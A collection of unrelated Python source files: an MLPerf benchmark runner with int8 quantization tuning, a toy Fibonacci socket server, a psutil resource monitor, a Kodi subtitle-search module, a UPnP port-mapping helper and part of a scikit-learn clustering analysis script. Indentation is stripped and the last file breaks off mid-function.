"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument('--tune', dest='tune', action='store_true',
help='tune best int8 model on calibration dataset')
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", default="output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", \
help="enable finding peak performance pass")
parser.add_argument("--debug", action="store_true", help="debug, turn traces on")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../../../utils/MLPerf/mlperf.conf", \
help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", \
help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", type=int, help="mlperf multi-stream sample per query")
parser.add_argument('--benchmark', dest='benchmark', action='store_true',
help='run benchmark')
parser.add_argument('--int8', dest='int8', action='store_true', help='run benchmark')
parser.add_argument("--tuned_checkpoint", default='./saved_results', type=str, metavar='PATH',
help='path to checkpoint tuned by Neural Compressor (default: ./)')
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
return result["mAP"]
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, \
max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
log_output_settings = lg.LogOutputSettings()
log_output_settings.outdir = output_dir
log_output_settings.copy_summary_to_stdout = False
log_settings = lg.LogSettings()
log_settings.enable_trace = args.debug
log_settings.log_output = log_output_settings
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.benchmark:
settings.mode = lg.TestMode.PerformanceOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 500), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
raw_model = runner.model.model
pattern = ['samples_per_query : \d+', 'Mean latency.*']
def eval_func(model):
global last_timeing
runner.model.model = model
lg.StartTestWithLogSettings(sut, qsl, settings, log_settings)
if not last_timeing:
last_timeing = runner.result_timing
post_proc.finalize(result_dict, ds, output_dir=args.output)
accu = add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
print('Accuracy: %.3f ' % (accu))
return accu
def benchmark(model):
global last_timeing
runner.model.model = model
lg.StartTestWithLogSettings(sut, qsl, settings, log_settings)
if not last_timeing:
last_timeing = runner.result_timing
file_path = os.path.join(args.output, 'mlperf_log_summary.txt')
f = open(file_path, 'r', encoding='UTF-8')
file_content = f.read()
f.close()
regex_batch = re.compile(pattern[0])
regex_late = re.compile(pattern[1])
samples_per_query = int(regex_batch.findall(file_content)[0].split(': ')[1])
latency_per_sample = int(regex_late.findall(file_content)[0].split(': ')[1])
print('Batch size = %d' % samples_per_query)
print('Latency: %.3f ms' % (latency_per_sample / 10**6))
print('Throughput: %.3f samples/sec' % (10**9/latency_per_sample))
os.chdir(os.path.join(sys.path[0], ".."))
if args.tune:
# Quantization with Neural Compressor
from neural_compressor.experimental import Quantization, common
quantizer = Quantization("./conf.yaml")
quantizer.model = common.Model(raw_model)
quantizer.eval_func = eval_func
q_model = quantizer()
q_model.save(args.tuned_checkpoint)
elif args.int8:
from neural_compressor.utils.pytorch import load
int8_model = load(os.path.abspath(os.path.expanduser(args.tuned_checkpoint)), raw_model)
if args.accuracy:
eval_func(int8_model)
elif args.benchmark:
benchmark(int8_model)
else:
if args.accuracy:
eval_func(raw_model)
elif args.benchmark:
benchmark(raw_model)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
server.py
|
import socket
import threading
def fib(n):
if n <= 2:
return 1
return fib(n - 1) + fib(n - 2)
def fib_server(address):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(5)
while True:
client, addr = sock.accept()
print(f"Connection from {addr}")
fib_handler(client)
def fib_server_threaded(address):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(5)
while True:
client, addr = sock.accept()
print(f"Connection from {addr}")
threading.Thread(target=fib_handler, args=(client,)).start()
def fib_handler(sock):
while True:
req = sock.recv(100).strip()
if not req:
break
n = int(req)
result = fib(n)
resp = f"{result}\n".encode("utf-8")
sock.send(resp)
if __name__ == "__main__":
address = ("", 25000)
# fib_server(address)
fib_server_threaded(address)
|
resource_monitoring.py
|
# -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/9/18 0018 10:29
import datetime
import json
import socket
import sys
import threading
import time
import psutil
from function_scheduling_distributed_framework.utils import LoggerLevelSetterMixin, LoggerMixin, decorators
from function_scheduling_distributed_framework.utils.mongo_util import MongoMixin
"""
# psutil.virtual_memory()
svmem = namedtuple(
'svmem', ['total', 'available', 'percent', 'used', 'free',
'active', 'inactive', 'buffers', 'cached', 'shared', 'slab'])
# psutil.disk_io_counters()
sdiskio = namedtuple(
'sdiskio', ['read_count', 'write_count',
'read_bytes', 'write_bytes',
'read_time', 'write_time',
'read_merged_count', 'write_merged_count',
'busy_time'])
# psutil.Process().open_files()
popenfile = namedtuple(
'popenfile', ['path', 'fd', 'position', 'mode', 'flags'])
# psutil.Process().memory_info()
pmem = namedtuple('pmem', 'rss vms shared text lib data dirty')
# psutil.Process().memory_full_info()
pfullmem = namedtuple('pfullmem', pmem._fields + ('uss', 'pss', 'swap'))
# psutil.Process().memory_maps(grouped=True)
pmmap_grouped = namedtuple(
'pmmap_grouped',
['path', 'rss', 'size', 'pss', 'shared_clean', 'shared_dirty',
'private_clean', 'private_dirty', 'referenced', 'anonymous', 'swap'])
# psutil.Process().memory_maps(grouped=False)
pmmap_ext = namedtuple(
'pmmap_ext', 'addr perms ' + ' '.join(pmmap_grouped._fields))
# psutil.Process.io_counters()
pio = namedtuple('pio', ['read_count', 'write_count',
'read_bytes', 'write_bytes',
'read_chars', 'write_chars'])
p = psutil.Process()
print(p)
print(p.memory_info()[0])
print(p.cpu_percent(interval=1))
print(p.cpu_percent(interval=1))
print(psutil.cpu_percent(1,percpu=True))
print(psutil.virtual_memory())
"""
class ResourceMonitor(LoggerMixin, LoggerLevelSetterMixin, MongoMixin):
# ResourceMonitor(is_save_info_to_mongo=True).set_log_level(20).start_build_info_loop_on_daemon_thread(60)
cpu_count = psutil.cpu_count()
host_name = socket.gethostname()
def __init__(self, process=psutil.Process(), is_save_info_to_mongo=False, mongo_col='default'):
self.process = process
self.logger.setLevel(20)
self.all_info = {}
self._is_save_info_to_mongo = is_save_info_to_mongo
self._mongo_col = mongo_col
@staticmethod
def divide_1m(value):
return round(value / (1024 * 1024), 2)
def get_current_process_memory(self) -> float:
result = self.process.memory_info()
self.logger.debug(result)
return self.divide_1m(result[0])
def get_current_process_cpu(self):
result = self.process.cpu_percent(interval=1)
self.logger.debug(result)
return result
def get_os_cpu_percpu(self):
result = psutil.cpu_percent(1, percpu=True)
self.logger.debug(result)
return result
def get_os_cpu_totalcpu(self):
result = round(psutil.cpu_percent(1, percpu=False) * self.cpu_count, 2)
self.logger.debug(result)
return result
def get_os_cpu_avaragecpu(self):
result = psutil.cpu_percent(1, percpu=False)
self.logger.debug(result)
return result
def get_os_virtual_memory(self) -> dict:
memory_tuple = psutil.virtual_memory()
self.logger.debug(memory_tuple)
return {
'total': self.divide_1m(memory_tuple[0]),
'available': self.divide_1m(memory_tuple[1]),
'used': self.divide_1m(memory_tuple[3]),
}
def get_os_net_info(self):
result1 = psutil.net_io_counters(pernic=False)
time.sleep(1)
result2 = psutil.net_io_counters(pernic=False)
speed_dict = dict()
speed_dict['up_speed'] = self.divide_1m(result2[0] - result1[0])
speed_dict['down_speed'] = self.divide_1m(result2[1] - result1[1])
speed_dict['packet_sent_speed'] = result2[2] - result1[2]
speed_dict['packet_recv_speed'] = result2[3] - result1[3]
self.logger.debug(result1)
return speed_dict
def get_all_info(self):
self.all_info = {
'host_name': self.host_name,
'process_id': self.process.pid,
'process_name': self.process.name(),
'process_script': sys.argv[0],
'memory': self.get_current_process_memory(),
'cpu': self.get_current_process_cpu(),
'os_memory': self.get_os_virtual_memory(),
'os_cpu': {'cpu_count': self.cpu_count, 'total_cpu': self.get_os_cpu_totalcpu(), 'avarage_cpu': self.get_os_cpu_avaragecpu()},
'net_info': self.get_os_net_info()
}
# nb_print(json.dumps(self.all_info,indent=4))
self.logger.info(json.dumps(self.all_info, indent=4))
if self._is_save_info_to_mongo:
self.all_info.update({'update_time': datetime.datetime.now()})
self.mongo_client.get_database('process_info').get_collection(self._mongo_col).insert_one(self.all_info)
return self.all_info
def start_build_info_loop(self, interval=60, ):
decorators.keep_circulating(interval)(self.get_all_info)()
def start_build_info_loop_on_daemon_thread(self, interval=60, ):
threading.Thread(target=self.start_build_info_loop, args=(interval,), daemon=True).start()
|
search.py
|
# -*- coding: utf-8 -*-
def __auth_service(core, service_name, request):
service = core.services[service_name]
response = core.request.execute(core, request)
if response.status_code == 200 and response.text:
service.parse_auth_response(core, service_name, response.text)
def __query_service(core, service_name, meta, request, results):
try:
service = core.services[service_name]
response = core.request.execute(core, request)
if response and response.status_code == 200 and response.text:
service_results = service.parse_search_response(core, service_name, meta, response)
else:
service_results = []
results.extend(service_results)
core.logger.debug(lambda: core.json.dumps({
'url': request['url'],
'count': len(service_results),
'status_code': response.status_code
}, indent=2))
finally:
core.progress_text = core.progress_text.replace(service.display_name, '')
core.kodi.update_progress(core)
def __add_results(core, results): # pragma: no cover
listitems = []
dualsub_enable = core.kodi.addon.getSetting('dualsub_enable') == 'true'
if(dualsub_enable):
results1 = []
for item in results:
if (item['name'].lower().endswith('.srt')):
results1.append(item)
results=results1
for item in results:
listitem = core.kodi.create_listitem(item)
action_args = core.utils.quote_plus(core.json.dumps(item['action_args']))
listitems.append(listitem)
if(not dualsub_enable):
core.kodi.xbmcplugin.addDirectoryItem(
handle=core.handle,
listitem=listitem,
isFolder=False,
url='plugin://%s/?action=download&service_name=%s&action_args=%s'
% (core.kodi.addon_id, item['service_name'], action_args)
)
if(dualsub_enable):
dialog = core.kodi.xbmcgui.Dialog()
while True:
ret = dialog.multiselect(core.kodi.addon.getLocalizedString(32027), [i for i in listitems],useDetails=True)
if ret and len(ret) > 2:
dialog.ok('', core.kodi.addon.getLocalizedString(32028))
else:
break
if ret and len(ret) > 0:
subs=[]
for sub in ret:
action_args = core.json.dumps(results[sub]['action_args'])
subs.append({'service_name':results[sub]['service_name'], 'action_args':action_args})
payload=core.json.dumps(subs[:2])
payload=core.utils.quote(payload)
listitem = core.kodi.xbmcgui.ListItem(label2=core.kodi.addon.getLocalizedString(32019))
url = "plugin://%s/?action=download&payload=%s" % (core.kodi.addon_id,payload)
core.kodi.xbmcplugin.addDirectoryItem(handle=core.handle,url=url,listitem=listitem,isFolder=False)
listitem = core.kodi.xbmcgui.ListItem(label2=core.kodi.addon.getLocalizedString(32026))
url = "plugin://%s/?action=downloadswap&payload=%s" % (core.kodi.addon_id,payload)
core.kodi.xbmcplugin.addDirectoryItem(handle=core.handle,url=url,listitem=listitem,isFolder=False)
def __has_results(service_name, results):
return any(map(lambda r: r['service_name'] == service_name, results))
def __save_results(core, meta, results):
try:
if len(results) == 0:
return
meta_hash = core.cache.get_meta_hash(meta)
json_data = core.json.dumps({
'hash': meta_hash,
'timestamp': core.time.time(),
'results': results
}, indent=2)
with open(core.cache.results_filepath, 'w') as f:
f.write(json_data)
except:
import traceback
traceback.print_exc()
def __get_last_results(core, meta):
force_search = []
try:
with open(core.cache.results_filepath, 'r') as f:
last_results = core.json.loads(f.read())
meta_hash = core.cache.get_meta_hash(meta)
if last_results['hash'] != meta_hash:
return ([], [])
has_bsplayer_results = __has_results('bsplayer', last_results['results'])
has_bsplayer_results_expired = core.time.time() - last_results['timestamp'] > 3 * 60
if has_bsplayer_results and has_bsplayer_results_expired:
last_results['results'] = list(filter(lambda r: r['service_name'] != 'bsplayer', last_results['results']))
force_search.append('bsplayer')
return (last_results['results'], force_search)
except: pass
return ([], [])
def __sanitize_results(core, meta, results):
temp_dict = {}
for result in results:
temp_dict[result['action_args']['url']] = result
try:
if result['sync'] == 'true':
ext = core.os.path.splitext(result['name'])[1]
result['name'] = '%s%s' % (meta.filename_without_ext, ext)
except: pass
result['name'] = core.utils.unquote(result['name'])
return list(temp_dict.values())
def __apply_language_filter(meta, results):
return list(filter(lambda x: x['lang'] in meta.languages, results))
def __apply_limit(core, all_results, meta):
limit = core.kodi.get_int_setting('general.results_limit')
lang_limit = int(limit / len(meta.languages))
if lang_limit * len(meta.languages) < limit:
lang_limit += 1
results = []
for lang in meta.languages:
lang_results = list(filter(lambda x: x['lang'] == lang, all_results))
if len(lang_results) < lang_limit:
lang_limit += lang_limit - len(lang_results)
results.extend(lang_results[:lang_limit])
return results[:limit]
def __prepare_results(core, meta, results):
results = __apply_language_filter(meta, results)
results = __sanitize_results(core, meta, results)
sorter = lambda x: (
not x['lang'] == meta.preferredlanguage,
meta.languages.index(x['lang']),
not x['sync'] == 'true',
-core.difflib.SequenceMatcher(None, x['name'].lower(), meta.filename).ratio(),
-x['rating'],
not x['impaired'] == 'true',
x['service'],
)
results = sorted(results, key=sorter)
results = __apply_limit(core, results, meta)
results = sorted(results, key=sorter)
return results
def __parse_languages(core, languages):
return list({language for language in (core.kodi.parse_language(x) for x in languages) if language is not None})
def __chain_auth_and_search_threads(core, auth_thread, search_thread):
auth_thread.start()
auth_thread.join()
search_thread.start()
search_thread.join()
def __wait_threads(core, request_threads):
threads = []
for (auth_thread, search_thread) in request_threads:
if not auth_thread:
threads.append(search_thread)
else:
thread = core.threading.Thread(target=__chain_auth_and_search_threads, args=(core, auth_thread, search_thread))
threads.append(thread)
core.utils.wait_threads(threads)
def __complete_search(core, results):
if core.api_mode_enabled:
return results
__add_results(core, results) # pragma: no cover
def __search(core, service_name, meta, results):
service = core.services[service_name]
requests = service.build_search_requests(core, service_name, meta)
core.logger.debug(lambda: '%s - %s' % (service_name, core.json.dumps(requests, default=lambda o: '', indent=2)))
threads = []
for request in requests:
thread = core.threading.Thread(target=__query_service, args=(core, service_name, meta, request, results))
threads.append(thread)
core.utils.wait_threads(threads)
def search(core, params):
meta = core.video.get_meta(core)
meta.languages = __parse_languages(core, core.utils.unquote(params['languages']).split(','))
meta.preferredlanguage = core.kodi.parse_language(params['preferredlanguage'])
core.logger.debug(lambda: core.json.dumps(meta, default=lambda o: '', indent=2))
if meta.imdb_id == '':
core.logger.error('missing imdb id!')
core.kodi.notification('IMDB ID is not provided')
return
threads = []
(results, force_search) = __get_last_results(core, meta)
for service_name in core.services:
if len(results) > 0 and (__has_results(service_name, results) or service_name not in force_search):
continue
if not core.kodi.get_bool_setting(service_name, 'enabled'):
continue
service = core.services[service_name]
core.progress_text += service.display_name + '|'
auth_thread = None
auth_request = service.build_auth_request(core, service_name)
if auth_request:
auth_thread = core.threading.Thread(target=__auth_service, args=(core, service_name, auth_request))
search_thread = core.threading.Thread(target=__search, args=(core, service_name, meta, results))
threads.append((auth_thread, search_thread))
if len(threads) == 0:
return __complete_search(core, results)
core.progress_text = core.progress_text[:-1]
core.kodi.update_progress(core)
ready_queue = core.utils.queue.Queue()
cancellation_token = lambda: None
cancellation_token.iscanceled = False
def check_cancellation(): # pragma: no cover
dialog = core.progress_dialog
while (core.progress_dialog is not None and not cancellation_token.iscanceled):
if not dialog.iscanceled():
core.time.sleep(1)
continue
cancellation_token.iscanceled = True
final_results = __prepare_results(core, meta, results)
ready_queue.put(__complete_search(core, final_results))
break
def wait_all_results():
__wait_threads(core, threads)
if cancellation_token.iscanceled:
return
final_results = __prepare_results(core, meta, results)
__save_results(core, meta, final_results)
ready_queue.put(__complete_search(core, final_results))
core.threading.Thread(target=check_cancellation).start()
core.threading.Thread(target=wait_all_results).start()
return ready_queue.get()
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "cryptodoge", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run cryptodoge, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join(5)
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
|
vowel-analysis.py
|
# source: https://github.com/joshuamorton/Machine-Learning/blob/master/P3/analysis.py
# source: https://github.com/iRapha/CS4641/blob/master/P3/analysis.py
import argparse
from pprint import pprint
from StringIO import StringIO
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans as KM
from sklearn.decomposition import FastICA as ICA
from sklearn.decomposition.pca import PCA as PCA
from sklearn.feature_selection import SelectKBest as best
from sklearn.feature_selection import f_classif
from sklearn.mixture import GMM as EM
from sklearn.random_projection import GaussianRandomProjection as RandomProjection
from sknn.mlp import Classifier, Layer
import data_util as util
def plot(axes, values, x_label, y_label, title, name):
print "plot" + title + name
plt.clf()
plt.plot(*values)
plt.axis(axes)
plt.title(title)
plt.ylabel(y_label)
plt.xlabel(x_label)
plt.savefig("plots/v/"+name+".png", dpi=500)
# plt.show()
plt.clf()
def pca(tx, ty, rx, ry):
print "pca"
compressor = PCA(n_components = tx[1].size/2)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wPCAtr")
km(newtx, ty, newrx, ry, add="wPCAtr")
nn(newtx, ty, newrx, ry, add="wPCAtr")
print "pca done"
def ica(tx, ty, rx, ry):
print "ica"
compressor = ICA(whiten=True) # for some people, whiten needs to be off
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wICAtr")
km(newtx, ty, newrx, ry, add="wICAtr")
nn(newtx, ty, newrx, ry, add="wICAtr")
print "ica done"
def randproj(tx, ty, rx, ry):
print "randproj"
compressor = RandomProjection(tx[1].size)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
# compressor = RandomProjection(tx[1].size)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wRPtr")
km(newtx, ty, newrx, ry, add="wRPtr")
nn(newtx, ty, newrx, ry, add="wRPtr")
print "randproj done"
def kbest(tx, ty, rx, ry):
print "kbest"
for i in range(9):
k = i + 1
add = "wKBtr" + str(k)
compressor = best(f_classif, k=k)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add=add)
km(newtx, ty, newrx, ry, add=add)
nn(newtx, ty, newrx, ry, add=add)
print "kbest done"
def em(tx, ty, rx, ry, add="", times=10):
print "em" + add
errs = []
# this is what we will compare to
checker = EM(n_components=2)
checker.fit(rx)
truth = checker.predict(rx)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
# create a clusterer
clf = EM(n_components=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
# here we make the arguably awful assumption that for a given cluster,
# all values in tha cluster "should" in a perfect world, belong in one
# class or the other, meaning that say, cluster "3" should really be
# all 0s in our truth, or all 1s there
#
# So clusters is a dict of lists, where each list contains all items
# in a single cluster
for index, val in enumerate(result):
clusters[val].append(index)
# then we take each cluster, find the sum of that clusters counterparts
# in our "truth" and round that to find out if that cluster should be
# a 1 or a 0
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
# the processed list holds the results of this, so if cluster 3 was
# found to be of value 1,
# for each value in clusters[3], processed[value] == 1 would hold
